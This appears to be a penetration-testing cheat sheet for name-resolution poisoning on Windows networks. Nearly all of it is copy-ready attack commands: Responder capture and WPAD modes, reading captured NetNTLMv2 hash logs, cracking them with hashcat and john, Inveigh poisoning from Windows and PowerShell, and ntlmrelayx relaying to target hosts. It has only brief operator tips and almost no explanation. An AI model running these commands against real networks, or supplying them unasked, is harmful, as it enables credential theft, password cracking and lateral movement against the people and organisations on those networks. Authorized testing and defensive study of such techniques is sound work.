Poisoning is the passive entry point for relay and hash capture. We answer name resolution traffic such as LLMNR, NBT-NS, mDNS, or WPAD, then capture or relay the authentication that follows.
Responder analyze mode
sudo responder -I eth0 -A
Responder capture mode
sudo responder -I eth0
sudo responder -I eth0 -rdw
Responder WPAD
sudo responder -I eth0 -w
Responder loot
ls -la /usr/share/responder/logs/
cat /usr/share/responder/logs/*NTLMv2*.txt
Crack captured NetNTLMv2
hashcat -m 5600 /usr/share/responder/logs/*NTLMv2*.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt /usr/share/responder/logs/*NTLMv2*.txt
Inveigh from Windows
.\Inveigh.exe -NBNS Y -LLMNR Y -DNS Y -HTTP Y -SMB Y -Console 3
.\Inveigh.exe -NBNS Y -LLMNR Y -Console 1 -FileOutput Y
.\Inveigh.exe -WPADAuth NTLM -Console Y -FileOutput Y
Inveigh PowerShell
Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y -LLMNR Y -WPADAuth NTLM -HTTP Y -ConsoleOutput Y
Get-Inveigh -NTLMv2
Stop-Inveigh
Poisoning into relay target file
ntlmrelayx.py -tf smb-relay-targets.txt -smb2support
Trigger examples
dir \\10.10.10.100\share
type \\10.10.10.100\share\file.txt
nslookup fakehost 10.10.10.100
Notes
Use analyze mode first when mapping a network. Capture mode and WPAD are louder because they answer client traffic.
Do not run Responder and Inveigh on the same segment at the same time. They will compete for the same traffic.